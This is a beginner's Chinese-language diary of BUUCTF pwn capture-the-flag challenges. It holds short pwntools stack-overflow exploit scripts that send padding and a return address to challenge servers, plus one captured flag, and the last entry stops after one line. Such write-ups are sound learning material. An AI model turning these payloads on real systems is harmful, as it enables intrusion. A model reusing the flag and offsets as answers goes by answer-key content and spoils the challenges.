我是純新手,零基礎的開始學Pwn嘍
時間:2024年10月29日
BUUCTF Pwn 學習日記
1.test_your_nc
下載附件,用IDA開啟
發現直接nc就可以獲得flag
cat flag得到flag{07c0b69c-dcbf-4991-8cc6-05660b1a2dd2}
2.rip
IDA開啟發現
沒有看見有用資訊,Shift+F12
發現了/bin/sh
初步懷疑是棧溢位,編寫指令碼
from pwn import *
p = remote("node5.buuoj.cn",27528)
payload = b'a' * (15+8) + p64(0x40118A)
p.sendline(payload)
p.interactive()
3.warmup_csaw_2016
nc後發現給出的地址在cat附近
且有get那麼好像也是棧溢位呢
大小是0x40
所以套用上一個題的指令碼有
from pwn import *
p = remote("node5.buuoj.cn",26099)
payload = b'a' * (0x40+8) + p64(0x40060d)
p.sendline(payload)
p.interactive()
4.ciscn_2019_n_1
發現是沒有保護的,直接進入IDA
有system!也有gets,嘗試棧溢位?
from pwn import *
p=remote("node5.buuoj.cn",28695)
#node5.buuoj.cn:28695
paypload=b'a'*(0x30+8)+p64(0x4006BE)
p.sendline(paypload)
p.interactive()
5.pwn1_sctf_2016
沒有任何保護
---------------------------------------------------------------------------------------------------------------2024年10月29日截至到22.16